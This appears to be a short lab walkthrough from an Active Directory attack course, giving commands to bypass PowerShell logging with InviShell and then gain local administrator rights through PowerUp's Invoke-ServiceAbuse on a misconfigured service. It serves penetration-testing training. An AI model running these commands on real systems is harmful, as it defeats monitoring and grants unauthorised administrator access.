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# Local Admin Privilege Escalation

1- Run this Batch file (helps bypass enhanced PowerShell logging)

```
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
```

\
2- We can use the Powerup from PowerSploit module to check for any privilege escalation path

```
. C:\AD\Tools\PowerUp.ps1
```

```
Invoke-AllChecks
```

3-  Let's use the abuse function for Invoke-ServiceAbuse and add our current domain user to the local Administrators group.

```
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx'
```

4- We can see that the dcorp\studentx is a local administrator now. Just logoff and logon again and we have local administrator privileges!


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